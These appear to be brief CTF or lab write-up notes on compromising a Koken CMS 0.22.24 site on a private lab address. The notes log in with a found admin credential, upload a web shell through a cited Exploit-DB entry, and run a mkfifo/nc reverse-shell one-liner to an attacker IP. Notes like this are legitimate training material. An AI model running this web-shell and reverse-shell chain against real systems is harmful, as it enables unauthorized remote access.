4 :8000 koken cms
http://192.168.71.76:8000/
Daisa Ahomi Website
Built w/ Koken
http://192.168.71.76:8000/admin/
# using the email
daisa@photographer.com:babygirl worked
# Koken CMS Exploit
http://192.168.71.76:8000/admin/#/settings
Version 0.22.24
Using https://www.exploit-db.com/exploits/48706
# web.php successfully uploaded
CMD: whoami;id;hostname
whoami;id;hostname
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
photographer
CMD: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.49.71 9090 >/tmp/f
# shell as www-dataLast updated